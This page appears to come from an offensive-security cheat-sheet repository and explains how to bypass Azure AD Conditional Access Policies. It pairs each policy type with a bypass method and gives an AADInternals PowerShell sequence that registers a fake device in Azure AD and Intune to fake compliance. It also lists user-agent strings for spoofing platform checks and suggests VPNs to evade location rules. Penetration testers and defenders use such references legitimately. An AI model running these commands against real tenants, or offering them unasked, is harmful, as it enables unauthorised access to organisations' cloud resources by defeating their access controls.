InternalAllTheThings/docs/cloud/azure/azure-ad-conditional-access...

3.0 KiB

Azure AD - Conditional Access Policy

Conditional Access is used to restrict access to resources to compliant devices only.

  • Enumerate Conditional Access Policies: roadrecon plugin policies (query the local database)
CAP Bypass
Location / IP ranges Corporate VPN, Guest Wifi
Platform requirement User-Agent switcher (Android, PS4, Linux, ...)
Protocol requirement Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP)
Azure AD Joined Device Try to join a VM (Work Access)
Compliant Device (Intune) Fake device compliance
Device requirement /
MFA /
Legacy Protocols /
Domain Joined /

Bypassing CAP by faking device compliance

# AAD Internals - Making your device compliant
# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache
# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
# Marking device compliant - option 1: Registering device to Intune
# Get an access token for Intune MDM and save to cache (prompts for credentials)
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache 
# Join the device to Intune
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
# Start the call back
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"

Bypassing CAP with device.trustType

The trustType property is an internal attribute that defines the relationship between the device and Azure AD. When the condition of CAP is device.trustType -eq "<TYPE>", the values can be:

  • AzureAD: Azure AD joined devices
  • Workplace: Azure AD registered devices
  • ServerAD: Hybrid joined devices

Bypassing CAP with user agent

There are several devices you can use to authenticate and interact with a service. Try several User-Agent to get access to the resources:

  • Windows: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100
  • Linux: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq
  • macOS: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq
  • Android: Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.117 Mobile Safari/537.36
  • iOS: Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1
  • WindowsPhone: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36

Bypassing CAP with location

Try different IP locations using a VPN.